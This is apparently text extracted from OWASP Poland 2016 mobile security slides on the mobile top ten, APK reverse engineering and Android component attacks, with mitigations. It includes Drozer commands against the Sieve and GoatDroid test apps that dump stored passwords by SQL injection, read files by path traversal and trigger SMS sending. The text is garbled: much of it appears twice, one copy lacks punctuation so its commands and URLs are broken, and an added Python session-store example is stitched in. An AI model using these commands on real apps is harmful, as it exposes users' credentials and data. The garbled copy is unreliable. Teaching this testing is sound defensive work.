M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed – they must be re-enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…): – encoding ≠ encryption – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device; use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from: – Another application via intent/content provider – A shared file – A server response – A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections: dz> run scanner.provider.injection -a <package_name>
• Data path traversal: dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and: – Verify if a session expires (copy a cookie and try to use it after 30 minutes) – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user) – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should one REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
– http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawel.rzepa@outlook.com
References:
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering amp Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone: – APKOptic – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High level – Java code
• Disassembling – Low level – assembly code
• Why disassembling and not decompiling?
Decompiling
(diagram: DEX → JAR → Java)
Decompiling-Dex2Jar
• dex2jar – Converts Dalvik bytecode (DEX) to Java bytecode (JAR) – Allows using any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten – Closed-source Java decompiler – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool – Open source Java tool for reverse-engineering Android apps – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar: java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the SD card before and after installing the application
• Analyze package files at different stages:
  adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it implements it incorrectly
What do you mean, „incorrectly"?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is done on the browser side
• It is done by a „chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in the source code: the expected X.509 certificate or public key
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection – how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domains):
  sslyze --regular www.example.com:443
Insufficient transport layer protection – example
Insufficient transport layer protection – a few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection – mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: httpswwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage covers the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leaks
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: httpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the APK using dex2jar (or Luyten for a more verbose result) and review the JAR file in JD-GUI
• Look for decryption keys (in attacker-readable folders or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted DB is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the passwords to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local DB
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity being started, etc.) via special objects called Intents
  Intent view = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent capture = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute „exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that „sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate sessions on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
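The four mitigations above, put together in a server-side session store; this is an added example, not code from the talk. The 30-minute idle window mirrors the "how to find" check, and the injectable FakeClock is a constructed helper so expiry can be exercised offline.

```python
"""Server-side session store: invalidation on the server, idle expiry,
destruction of stale tokens when the authentication state changes, and
CSPRNG-generated tokens instead of a guessable value such as a device ID."""
import secrets
import time

IDLE_TIMEOUT_SECONDS = 30 * 60   # same window as the "use the cookie after 30 minutes" check


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock        # injectable so tests can move time forward
        self._sessions = {}        # token -> {"user": ..., "last_seen": ...}

    def create(self, user):
        """Log `user` in: every token the user already holds is destroyed, then a
        fresh 256-bit random token is issued (also defeats session fixation, where
        a token minted before authentication would otherwise stay valid)."""
        self.destroy_all_for(user)
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"user": user, "last_seen": self._clock()}
        return token

    def validate(self, token):
        """Return the user for a live token, or None. A token idle for longer than
        IDLE_TIMEOUT_SECONDS is destroyed instead of being accepted."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        now = self._clock()
        if now - entry["last_seen"] > IDLE_TIMEOUT_SECONDS:
            del self._sessions[token]
            return None
        entry["last_seen"] = now
        return entry["user"]

    def logout(self, token):
        """Server-side invalidation: the client forgetting its cookie is not enough."""
        self._sessions.pop(token, None)

    def switch_user(self, old_token, new_user):
        """Authentication state change: the previous session is destroyed before the
        new user's token is issued, so the old token cannot linger on the device."""
        self.logout(old_token)
        return self.create(new_user)

    def destroy_all_for(self, user):
        stale = [t for t, e in self._sessions.items() if e["user"] == user]
        for t in stale:
            del self._sessions[t]
        return len(stale)

    def live_count(self):
        return len(self._sessions)


class FakeClock:
    """Constructed clock for deterministic expiry checks (not for production use)."""
    def __init__(self, start=1_000_000.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds
```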
Thank you
pawelrzepaoutlookcom
References
• httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• httpsgithubcomikusthello-pinnedcerts
• httpwwwexploresecuritycomtesting-for-cipher-suite-preference
• httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• httpwwwslidesharenetJackManninoowasp-top-10-mobile-risks
• httpsmanifestsecuritycomandroid-application-security
• httpsmobilesecuritywikicom
• httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtml
• httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=ampid=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2
• httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testing
• httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
• httpswwwssllabscomssltest
• httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-step
• httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• httpsgithubcomlinkedinqark
• httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtml
• httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• httpthehackernewscom201405microsoft-outlook-app-for-androidhtml
• httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an APK
Getting our APK file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling – Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows you to use any existing Java decompiler with the resulting JAR file
Decompiling – Java decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar, you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (DEX) into Smali source
Signing the APK
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling with Luyten
Demo: Modifying Smali files
Demo
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
  – Isolation
  – Privilege separation
• How sensitive data is transmitted
  – Extra-device communication
  – Inter-application communication
  – Inter-component communication
Android Application Components
Activities, Services, Content providers, Broadcast receivers
Android Application Components
AndroidManifest.xml defines the way the app works and what kind of interaction between components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
  <uses-permission android:name="string" />
  <permission android:protectionLevel="…" />
• Components and their attributes
AndroidManifest.xml
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
• debuggable
• enabled
• exported
• permission
Example component attributes (Activities, Services, Content providers, Broadcast receivers)
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component, and the requested action/data.
  Intent intent = new Intent(Intent.ACTION_VIEW);
  intent.setData(Uri.parse("http://www.google.com"));
  String pack = "com.android.browser";
  ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
  intent.setComponent(comp);
  startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC - the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
  dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer
It is installed in the default package of AppUse together with adb, so it is enough to just „click-and-play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it via intents it's possible to achieve the following:
  – Modifying data in the background
  – Tricking the user
  – Leaking sensitive information
Activity components attacks
• General hijacking scheme
• Results of an attack:
  – A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities:
  dz> run app.activity.info -a com.mwr.example.sieve
  Package: com.mwr.example.sieve
    com.mwr.example.sieve.FileSelectActivity
    com.mwr.example.sieve.MainLoginActivity
    com.mwr.example.sieve.PWList
  dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like intents, files, or the network stack)
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat to check for sensitive info
• Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
